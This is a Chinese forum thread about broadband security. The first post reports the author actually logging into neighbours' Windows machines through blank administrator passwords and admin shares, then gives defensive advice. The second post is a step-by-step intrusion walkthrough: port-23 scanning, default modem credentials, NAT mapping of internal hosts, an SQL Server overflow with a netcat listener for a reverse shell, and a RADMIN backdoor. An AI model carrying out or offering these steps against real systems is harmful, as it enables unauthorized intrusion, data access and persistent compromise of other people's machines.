【转帖】用宽带？请注意安全

【转帖】用宽带？请注意安全！
　　似乎有很多介绍宽带上网安全的文章，但往往提到的是木马、IE的漏洞之类的问题，殊不知有一类更危险的问题却好像未被用户注意，甚至不为防火墙所重视，但是一旦被人入侵却可以随意共享你的所有驱动器和其中的文件，而且实现起来是如此的简单。是何危险？且听我慢慢道来。

　　思考

　　近来我正在装修新居，这两天考虑到新家的局域网的网络结构，因为我早使用上了有线通，到时候肯定移机过去，所以现在有两种方案能被我考虑：

　　1、CABLE MODEM——HUB——各台主机；
　　2、CABLE MODEM——服务器（软路由）——HUB——各台主机

　　看到这里大家一定认为第一种方案更好，很明显网络结构简单，至少可以节约一块网卡，而且不需要有一台服务器整天开着。有线通的说明书上也是这么推荐的。但是，我正是想到第一种方案各台主机之间的共享时，才突然意识到长期未被我重视的安全问题。

　　大家都知道，所谓的小区宽带是一种局域网+互联网出口的解决方案，小区的用户连在一个局域网上，然后通过一个出口上互联网，这种方案的安全性是比较差的，主要是内部的安全性，因为是连在一个局域网上嘛，如果你不注意，别人是可能共享到你的资源的。而有线通的问题则比较有隐蔽性，他在物理上并不是我们常见的星形以太网+出口的结构，而且DHCP服务器分配给用户的也是标准的C类地址，似乎我们直接面对的就是广域网上的冲击。殊不知，他在物理上的总线型结构把几乎所有的有线通用户连接在了一个局域网上，我们同样面临着一个严重的本地网的安全问题，而且这个本地网的范围更大，因此被入侵（严格的来讲不能叫做入侵，而是共享）的机率就更大。

　　实验

　　为了验证我的观点，特地做了以下实验：

　　我的主机现在被分配到的ip地址是211.167.123.8，这是一个标准的c类地址，因此子网掩码是24位，这就意味着理论上有252台主机（去掉网关和我自己）和我是处在同一网段中，考虑到有线通的实际使用率，252台估计是没有的，但同时间几十台应该还是有的，应该说我是可以访问到这些主机的。

　　于是我就ping，从211.167.123.2开始，到211.167.123.15 ping通了，说明这台主机正联线，我马上打开IE，在地址栏中输入\\211.167.123.15，系统提示我输入用户名和密码，用户名输入administrator，密码为空，嘿嘿，进入了。除了打印机外看不到什么共享资源？没关系，我已经是管理员了，还怕找不到资源？我再输入\\211.167.123.15\c$，c盘的根目录不就出来了，这是windows2000的默认共享，是为管理而设的，去不掉的。接下来d$、e$，要找什么自己输入。
在整个实验的过程中，配合上FluxayIV（流光），一个网段3、5分钟就搞定了，发现有3x台主机正联线，其中居然有5、6台主机的administrator账号密码为空，这岂不是任人宰割了？就算那些设了密码的，一般也不会有人在自己的电脑上设得太复杂，如果有心拆解的话，配上个词典，也不是很困难的事。更有甚者，可能是一台某个公司的主机，居然直接共享了所有的资源，没有任何密码，看来是被他们作为文件服务器使用了。

　　结论

　　现在大家知道我上面说的两种方案哪个更好了吧？

　　由于有线通分配的是标准C类地址，不可能通过延长子网掩码去减少每个网段的主机数，所以
本地网的安全始终是我们这些用户的大敌。而且DHCP服务器分配的IP地址是有存活期的，大概一个星期左右，你又会被分配到一个新的IP地址，也就意味着你又进入了一个新的网段，又有252个新邻居在等着你，可怕吧？最可怕的是，和你处在同一网段的主机被你的防火墙认为是局域网主机，一般防火墙的预设里不会对这类主机进行设防。

　　防范措施

　　首先，也是最起码的，就是为你的administrator账号设一个密码（不能太简单），因为这个
账号是删不掉的，你即使不用也不能让密码空着。在实验的过程中我发现有好多用户平时可能用另外一个账号，密码倒是设了，但administrator的密码却是空的，那你岂不是白忙一场？

　　还有些用户administrator账号密码设了，但又开了几个密码为空的账号，这同样是危险的。
记住，所有的可用账号都要设密码，而且要定时管理这些账号，关闭长期不用的账号，对于administrator账号最好是能经常更换密码。

　　安装一两个防火墙是好方法，但记住一定要对防火墙进行设置，因为一般预设里面对局域网主机是没有严密防范的，而你看到这里应该知道我们最需要防范的恰好是这些“局域网”主机。同时，防火墙本身也可能是有漏洞的，所以我用的是天网+Norton，这样交叉防范还是比较令我放心的。至于防火墙的具体设置方法就请参阅相关文章了，我就不赘述了。

　　还要提醒你的就是，作了这样防范之后，如果你的网络结构采用的是第一种方案，那么你的几台主机之间也不能共享了，因为这几台主机和本网段的其他主机是处在平等地位。所以你如果要建设自己的网络，考虑到安全性，建议你采用第二种方案，如果能用硬件路由器代替软路由那就更佳了。

　　写这篇文章的目的是希望起到抛砖引玉的作用，如果各位看官想到方便、安全、高效的防范手段请一定和我交流。

l.hm

2006年12月18日 21:25:50

2楼

ADSL入侵方法

实例:
步骤：

一．扫描

现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理，但80 21端口有很多服务器都有打开，没怎么特征性，于是我选择了23端口，打开我的至爱：SUPPERSCAN，填上我所在地区的IP段，（跨多几段都没关系，反正SUPPERSCAN的速度就是快）眨眼间，结果出来了，开23的主机还真不小啊：）我挑了几台出来，在浏览器那里输入IP：218.xxx.xxx.xxx，OK。登陆对话框出来了，输入USER：ADSL pass:adsl1234（因为我这里的adsl modem一般是华硕的，缺省是adsl adsl1234）bingle 一矢中的，现在我就是上帝。

二．映射

入侵已经成功了一半，要进一步入侵内网，我们要进行端口映射，但是我连内网的拓扑，都不知道（更不用说内网主机的端口开放情况了）又怎么映射呢？在此，我选择了猜测。一般来说，MODEM的内网IP缺省是192．168．1．1，而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192．168．1．2的端口映射出来就行了（但如果使用了dhcp就麻烦了）。但是192．168．1．2到底开放了什么端口，我们根本就不知道啊，呵呵，既然不知道，那么我就把他整台主机透明地映射到外网，具体做法如下：进入NAT选项---添加NAT规则---BAMID---填入主机IP：192．168．1．2，到此192．168．1．2已经透明地映射到192．168．1．1上了，我们访问ADSL MODEM就等于访问主机192．168．1．2了

三．检测

现在我们再请出SUPPERSCAN对218．xxx．xxx．xxx进行扫描，呵，看到没有？扫描结果已经不同了，开放的端口是139 1433等，刚才只是开放了80 23 21 而已（也就是说我们的映射已经成功了）该是X-SCAN出手了，用它来扫弱口令最好不过了，但扫描的结果令人失望，一个弱口令也没有，看来管理员还不算低B啊。

四．溢出

既然没有弱口令，也没开80，那只好从溢出方面着手了，但没开80 21 也就webdav .sevr-u的溢出没戏了，很自然，我向导了RPC溢出，但实践证明RPC溢出也是不行的，LSASS溢出也不行。

五．募然回首，那人却在，灯火阑珊处

　　看来这管理员还是比较负责的，该打的补丁都打上了，这时侯，我的目光转移到1433上了（嘿，不知道他打了SQL补丁没有？）心动不如行动，现在只好死马当活马医了，于是
　　nc -v -l 99
　　sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
bingle 成功地得到一个shell了。

六．设置后门

到这里，我们的入侵已经成功了，余下的是扫尾留后门，至于后门，我一般都是用FTP上传RADMIN上去的，呵呵，这里不详谈了，相信各位都知道。

jiangtaojtao

2007年01月15日 19:22:50

3楼

高手

xinfu2002

2007年01月18日 13:27:48

4楼

酒哥,还是你牛,看得有点晕,不过有空还是介绍一下相关的书来看一下啥!

susanshl

2007年01月19日 13:28:38

5楼

我就更看不懂了，以后多来看看，扫盲啊